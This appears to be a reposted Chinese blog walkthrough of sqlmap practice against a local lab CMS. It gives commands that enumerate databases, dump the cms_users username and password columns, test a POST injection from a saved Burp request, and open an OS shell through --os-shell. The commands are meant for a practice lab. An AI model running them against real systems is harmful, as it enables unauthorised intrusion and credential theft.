sqlmap练习

将目标可能存在SQL注入漏洞的链接在sqlmap中扫描查看有哪些注入点。

sqlmap -u "http://192.168.16.136/cms/list.php?id=23"

image-20230824222646707

sqlmap -u "http://192.168.16.136/cms/list.php?id=23" --dbs #获取数据库名

image-20230824222840257

sqlmap -u "http://192.168.16.136/cms/list.php?id=23" --current -db #获取当前数据库名

image-20230824223013477

sqlmap -u "http://192.168.16.136/cms/list.php?id=23" -D "cms" --tables #查询cms数据库中的表名

image-20230824223139931

sqlmap -u "http://192.168.16.136/cms/list.php?id=23" -D "cms" -T "cms_users" --columns #查询users表中的字段名

image-20230824224249572

sqlmap -u "http://192.168.16.136/cms/list.php?id=23" -D "cms" -T "cms_users" -C "users_username,users_password" --dump #查看字段username和password的值

image-20230824224705855

post注入

使用bp进行抓包,将数据包保存

image-20230824225731866

image-20230824225943716

sqlmap -r /tmp/post.txt # 扫描判断注入点

选择不跟踪

image-20230824230138094

image-20230824230320896

找到注入点。

sqlmap -u "http://192.168.16.136/cms/list.php?id=23" --os-shell

image-20230824230609234

选择4然后选择2输入

C:\phpStudy_20161103\www\

回车,输入y,获得回显

image-20230824230845499

03\www\


回车,输入y,获得回显

[外链图片转存中...(img-DoUwtrj2-1693124804538)]

猜你喜欢

转载自blog.csdn.net/weixin_58954236/article/details/132524784